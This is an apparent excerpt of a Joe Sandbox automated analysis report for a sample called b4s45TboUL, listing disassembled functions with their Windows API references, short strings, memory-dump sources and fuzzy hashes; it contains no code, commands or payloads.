Download Yara Rule

APIs

memmove.MSVCRT ref: 61E4F618
memmove.MSVCRT ref: 61E4F713
memmove.MSVCRT ref: 61E4F7B5

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 3ee8ba8a2f9b3bb34921be715b9eebf8d93374994481696b77743d8556de7eb7
Instruction ID: bc40f1fef1a9170960cc57993c705059dbee377a108b532450c26420989eb83f
Opcode Fuzzy Hash: 3ee8ba8a2f9b3bb34921be715b9eebf8d93374994481696b77743d8556de7eb7
Instruction Fuzzy Hash: ACE2F174A046698FCB65CF69D880BD9B7F1BF89314F2481E9D948A7314D738AE85CF80

Function 6CFE0DE0 Relevance: 4.6, APIs: 3, Instructions: 83filenativesynchronizationCOMMON

Download Yara Rule

APIs

NtWriteFile.NTDLL ref: 6CFE0E3F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6CFE0E4F
RtlNtStatusToDosError.NTDLL ref: 6CFE0E6F

Memory Dump Source

Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd

Similarity

API ID: ErrorFileObjectSingleStatusWaitWrite
String ID:
API String ID: 3447438843-0
Opcode ID: 71f95e4c199b1c4c30354b460a562283c3b8181a6a296b3b9af47aa68571f82d
Instruction ID: fe3cc13712f35da5b1fdd70c6dd56a92af2b368a0bfc41fb7ff178522f2d08e5
Opcode Fuzzy Hash: 71f95e4c199b1c4c30354b460a562283c3b8181a6a296b3b9af47aa68571f82d
Instruction Fuzzy Hash: 62317175508305AFE304CF14C854B9BBBF5EBC8758F10892DF9A497380D7B4A9058B96

Function 61E77452 Relevance: 4.4, Strings: 2, Instructions: 1874COMMON

Download Yara Rule

Strings

rows updated, xrefs: 61E78DEC
ROWID, xrefs: 61E777EF

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: ROWID$rows updated
API String ID: 0-3149524134
Opcode ID: 7fc51814d4df85eb7f7c1a496900f899ee2e71b5c20762128eabbebdfffcb40d
Instruction ID: d39c60c32cc69d7ad3465f9f6cb7242007ae0eab8187012a9ec74863cc1168bc
Opcode Fuzzy Hash: 7fc51814d4df85eb7f7c1a496900f899ee2e71b5c20762128eabbebdfffcb40d
Instruction Fuzzy Hash: 5913E474A04259CFEB20CFA8C484B9DBBF1BF89308F208559D899AB355D774E986CF41

Function 61E9F0ED Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 858COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E9F2E4

Strings

, xrefs: 61E9F16F

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-3916222277
Opcode ID: 28d1f33e7dd264d4a48ffac20ff2b996ab0e707b513a94353eac973f764cc450
Instruction ID: bfece18307556e4ef4cbbc35f99f21af59f03d97bd6a6be96c4aa07d47f44be4
Opcode Fuzzy Hash: 28d1f33e7dd264d4a48ffac20ff2b996ab0e707b513a94353eac973f764cc450
Instruction Fuzzy Hash: 9F82D375E04259CFDB04CFA8C580A8DBBF1BF88308F258569E859AB355D778E946CF80

Function 61EA70CF Relevance: 3.2, Strings: 1, Instructions: 1931COMMON

Download Yara Rule

Strings

d, xrefs: 61EA862E

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 39af19a113e19b71ee75d248144d88124ac87e74ed1a4a7d969078216bc50fcd
Instruction ID: a6081b29965de0926bd1f9b116bef4fbec5f60393564f64626f3e1bb6397bda8
Opcode Fuzzy Hash: 39af19a113e19b71ee75d248144d88124ac87e74ed1a4a7d969078216bc50fcd
Instruction Fuzzy Hash: 5823C374A04259CFDB60DFA8C884B8DBBF1BF88308F2585A9D888AB345D775D985CF41

Function 61E672DC Relevance: 3.1, Strings: 2, Instructions: 612COMMON

Download Yara Rule

Strings

`, xrefs: 61E68304
, xrefs: 61E67682

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: $`
API String ID: 0-2069241612
Opcode ID: 5eadeb913d8a7e32e3fb13a38341bb352b6bba7da8cd378bd3f56dec86492d22
Instruction ID: f5d1834218b0644dc9413ec29fdd40a604c3a9ef9e80d4570fc6a9fa81371110
Opcode Fuzzy Hash: 5eadeb913d8a7e32e3fb13a38341bb352b6bba7da8cd378bd3f56dec86492d22
Instruction Fuzzy Hash: 8562B074A41269CFEB60CF28C980B98BBF5BB48314F5585DAE849A7351D770EE81CF50

Function 61E651DD Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

`, xrefs: 61E65D46
N, xrefs: 61E65461

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: N$`
API String ID: 0-1193824278
Opcode ID: 1695c2255dbd43fefbf3ec3ae884fd43f98a3cc923433ff91cb67868f5529755
Instruction ID: e8c1d3730f2f7e8f69519fa84ea5dfa2fa83ba7ea746cf6dea917a2a2b262f61
Opcode Fuzzy Hash: 1695c2255dbd43fefbf3ec3ae884fd43f98a3cc923433ff91cb67868f5529755
Instruction Fuzzy Hash: 0C323570A44265CFEB21CF58C880B89BBB5BF45358F6582D9D859AB392D370ED81CF90

Function 61E62554 Relevance: 3.0, Strings: 2, Instructions: 459COMMON

Download Yara Rule

Strings

BINARY, xrefs: 61E62831, 61E62877, 61E628BA, 61E628D8
0, xrefs: 61E6283F

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: 0$BINARY
API String ID: 0-1556553403
Opcode ID: dbf5463f1b26696ad097613312d0e8a281b4cdde38a6e2070d2bb0de8395586b
Instruction ID: e60323d610b5e953cfa2bbac53d573cb4ccd773d83c01c1116e4164fd3caed25
Opcode Fuzzy Hash: dbf5463f1b26696ad097613312d0e8a281b4cdde38a6e2070d2bb0de8395586b
Instruction Fuzzy Hash: 5E22E1B4E0425A8FDB04CFA8D480A9DBBF1FF98314F658569E859AB355D734E842CF80

Function 61E8D0B6 Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

9ua, xrefs: 61E8D1EA
BINARY, xrefs: 61E8D1D0, 61E8D1E5

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: 9ua$BINARY
API String ID: 0-3775120692
Opcode ID: 5d1058f1121b4ac832307e0b4c14ecdaa80b0c74fbff9087e03826d3a53d8ce7
Instruction ID: a257fdc816b75983c87695270593668a71f4eb775f4fb4bb7c1b83965cb32a4b
Opcode Fuzzy Hash: 5d1058f1121b4ac832307e0b4c14ecdaa80b0c74fbff9087e03826d3a53d8ce7
Instruction Fuzzy Hash: ED811978A0461A9FDB41CFA9D58079EBBF1BF88758F21C02AEC58AB354D774D841CB90

Function 6CFC9DF1 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON

Download Yara Rule

Strings

xn--, xrefs: 6CFCA041

Memory Dump Source

Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: xn--
API String ID: 0-2826155999
Opcode ID: 36e2dc768710a6dcfd7f99a75ba5cf08cb9ddc9a20555a2d2f28c9de01ed3b85
Instruction ID: 570b030b98aa3f30bf4d3afebdbc228d46fd2c91a6e5aaaab05bf1c8014ec7d6
Opcode Fuzzy Hash: 36e2dc768710a6dcfd7f99a75ba5cf08cb9ddc9a20555a2d2f28c9de01ed3b85
Instruction Fuzzy Hash: 08A246B2F0526A8ADF04CF64C8A03EFB7F1BF45308F1442AAD45677A81D3356A85CB52

Function 61E7A790 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

4, xrefs: 61E7B364

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 69e42c9349b47ab598709cf7bf194c5a9beee1fbfb6073163f528dbfc61e7f72
Instruction ID: 518d6d0113e266a091a0cbf43dd9b6b92f5400263bfdc1a72100ca210d41eac5
Opcode Fuzzy Hash: 69e42c9349b47ab598709cf7bf194c5a9beee1fbfb6073163f528dbfc61e7f72
Instruction Fuzzy Hash: E7C2D274A042598FEB20CFA8C490B9DBBF1BF89308F24C559E855AB390D774E886CF51

Function 61E98FE2 Relevance: 2.2, Strings: 1, Instructions: 993COMMON

Download Yara Rule

Strings

0, xrefs: 61E99C5F

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 48b6196e9fac38c3e88230cedd955c73ebae4f8bcae3e36ccb28a35b721a3cf5
Instruction ID: b9cfdf9aff36692a2be4ad7309719c75a621d287fa98b86d1028b92f8662c608
Opcode Fuzzy Hash: 48b6196e9fac38c3e88230cedd955c73ebae4f8bcae3e36ccb28a35b721a3cf5
Instruction Fuzzy Hash: 83A2F775A04229CFDB25CF68C890B99BBB1BB89304F2584D9D88DA7351DB30EE85CF51

Function 61EA91F6 Relevance: 2.2, Strings: 1, Instructions: 922COMMON

Download Yara Rule

Strings

optimize, xrefs: 61EA928B

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: optimize
API String ID: 0-3797040228
Opcode ID: f5402574cac30fe7d3fd3d7b5c35659526e9f8efed4e34d94690394b9f3c71d2
Instruction ID: 746819fbde02672c5e9b0b23433deca564a22272aedf92c5aa0001529aa1c472
Opcode Fuzzy Hash: f5402574cac30fe7d3fd3d7b5c35659526e9f8efed4e34d94690394b9f3c71d2
Instruction Fuzzy Hash: ABA2E6B4A043698FDB10DF68C88478DBBF1BF89308F2589A9D889AB344D775D985CF41

Function 61E6667F Relevance: 2.1, Strings: 1, Instructions: 818COMMON

Download Yara Rule

Strings

BINARY, xrefs: 61E671D6

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: BINARY
API String ID: 0-907554435
Opcode ID: c8d0b50e4d115d300b53d3cd8d4b46905547811b89af05c61717644106981bf2
Instruction ID: 1524dd747bf857ec4baaba04828f8d2f29ccbb9c11785f708be4a3eeb89fa39b
Opcode Fuzzy Hash: c8d0b50e4d115d300b53d3cd8d4b46905547811b89af05c61717644106981bf2
Instruction Fuzzy Hash: AB92F174A452698FEB60CF28C980B98BBF1BF48314F5485DAD849A7391D774EE81CF90

Function 61E40065 Relevance: 1.6, APIs: 1, Instructions: 349COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E4010A

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 11a0e6a4d076267dca466a296c2d0d8e725e0aa5c18e5fc0149600946a27ef5a
Instruction ID: 5f607dce3bb248c7bc7ba639c908390524c363e3b0c88829d9203463054831df
Opcode Fuzzy Hash: 11a0e6a4d076267dca466a296c2d0d8e725e0aa5c18e5fc0149600946a27ef5a
Instruction Fuzzy Hash: D4E12675A04209CFDB04CFA8D49069EBBF2BF98314F29856AEC54EB346D734E951CB90

Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID:
API String ID: 62757014-0
Opcode ID: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
Opcode Fuzzy Hash: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6

Function 0041D21A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
